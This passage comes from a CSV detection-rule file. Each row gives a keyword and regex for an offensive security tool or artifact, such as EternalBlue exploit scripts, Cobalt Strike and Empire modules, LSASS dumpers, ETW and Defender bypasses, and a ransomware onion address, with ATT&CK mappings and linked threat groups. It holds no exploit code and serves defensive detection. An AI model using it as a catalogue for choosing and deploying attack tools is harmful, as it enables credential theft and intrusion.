Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43224"
"*EoP PoC exploiting the AMD driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sAMD\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43225"
"*EoP PoC exploiting the Intel driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sIntel\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43226"
"*eop_pdfwkrnl.py*",".{0,1000}eop_pdfwkrnl\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43227"
"*eop_pdfwkrnl_loop.py*",".{0,1000}eop_pdfwkrnl_loop\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43228"
"*eop_rtport.py*",".{0,1000}eop_rtport\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43229"
"*eop_stdcdrvws64.py*",".{0,1000}eop_stdcdrvws64\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43230"
"*epicgames_stealer*",".{0,1000}epicgames_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43231"
"*epinna/weevely3*",".{0,1000}\/Weevely3.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","1","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","43232"
"*erase_dos_magic_bytes(*",".{0,1000}erase_dos_magic_bytes\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","43234"
"*erebe/wstunnel*",".{0,1000}erebe\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","43236"
"*Erebus/*spacerunner*",".{0,1000}Erebus\/.{0,1000}spacerunner.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","43237"
"*ERPScan-tockenchpoken.zip*",".{0,1000}ERPScan\-tockenchpoken\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43238"
"*Error parsing lsass dump with pypykatz*",".{0,1000}Error\sparsing\slsass\sdump\swith\spypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","43240"
"*Error: Could not create a thread for the shellcode*",".{0,1000}Error\:\sCould\snot\screate\sa\sthread\sfor\sthe\sshellcode.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","43241"
"*eRv6yTYhShell*",".{0,1000}eRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","43242"
"*erwan2212/NTHASH-FPC*",".{0,1000}erwan2212\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","43243"
"*ES.Alan.Core/*",".{0,1000}ES\.Alan\.Core\/.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","43244"
"*es3n1n/no-defender*",".{0,1000}es3n1n\/no\-defender.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","43245"
"*es3n1n\no-defender*",".{0,1000}es3n1n\\no\-defender.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","43246"
"*escalate/golden_ticket*",".{0,1000}escalate\/golden_ticket.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43247"
"*escalate/unmarshal_cmd_exec*",".{0,1000}escalate\/unmarshal_cmd_exec.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43248"
"*EspressoCake/PPLDump_BOF*",".{0,1000}EspressoCake\/PPLDump_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","43251"
"*et22fibzuzfyzgurm35sttm52qbzvdgzy5qhzy46a3gmkrrht3lec5ad.onion*",".{0,1000}et22fibzuzfyzgurm35sttm52qbzvdgzy5qhzy46a3gmkrrht3lec5ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43266"
"*Eternal Blue Windows Shellcode Compiler*",".{0,1000}Eternal\sBlue\sWindows\sShellcode\sCompiler.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43267"
"*Eternalblue-*.exe*",".{0,1000}Eternalblue\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","43268"
"*EternalBlue.ps1*",".{0,1000}EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43269"
"*eternalblue.rb*",".{0,1000}eternalblue\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43270"
"*eternalblue_exploit10.py*",".{0,1000}eternalblue_exploit10\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43271"
"*eternalblue_exploit7.py*",".{0,1000}eternalblue_exploit7\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43272"
"*eternalblue_exploit8.py*",".{0,1000}eternalblue_exploit8\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43273"
"*eternalblue_kshellcode_x64.asm*",".{0,1000}eternalblue_kshellcode_x64\.asm.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43274"
"*eternalblue_kshellcode_x86.asm*",".{0,1000}eternalblue_kshellcode_x86\.asm.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43275"
"*eternalblue_poc.py*",".{0,1000}eternalblue_poc\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43276"
"*eternalblue_sc_merge.py*",".{0,1000}eternalblue_sc_merge\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43277"
"*Eternalblue-Doublepulsar*",".{0,1000}Eternalblue\-Doublepulsar.{0,1000}","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1218","TA0002 - TA0003","N/A","APT15 - Calypso - Equation Group","Exploitation tool","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","N/A","10","1115","520","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z","43278"
"*EternalHushFramework-*-SNAPSHOT.jar*",".{0,1000}EternalHushFramework\-.{0,1000}\-SNAPSHOT\.jar.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43279"
"*EternalHushFramework-main*",".{0,1000}EternalHushFramework\-main.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43280"
"*EternalHushMain.java*",".{0,1000}EternalHushMain\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43281"
"*EternalHushWindow.java*",".{0,1000}EternalHushWindow\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43282"
"*ethereum2john.py*",".{0,1000}ethereum2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43283"
"*etw-bypass*",".{0,1000}etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43284"
"*ETWEventSubscription*Program.cs*",".{0,1000}ETWEventSubscription.{0,1000}Program\.cs.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43285"
"*ETWEventSubscription.exe* -ProcStart *",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-ProcStart\s.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43286"
"*ETWEventSubscription.exe* -UserLogon*",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-UserLogon.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43287"
"*etw-fuck.exe *",".{0,1000}etw\-fuck\.exe\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","43288"
"*EtwHash.exe*",".{0,1000}EtwHash\.exe.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43289"
"*EtwHash.git*",".{0,1000}EtwHash\.git.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43290"
"*ETWHash.sln*",".{0,1000}ETWHash\.sln.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43291"
"*etwti-hook.*",".{0,1000}etwti\-hook\..{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43292"
"*eu.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}eu\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","43293"
"*eu1-etc.ethermine.org*",".{0,1000}eu1\-etc\.ethermine\.org.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","43294"
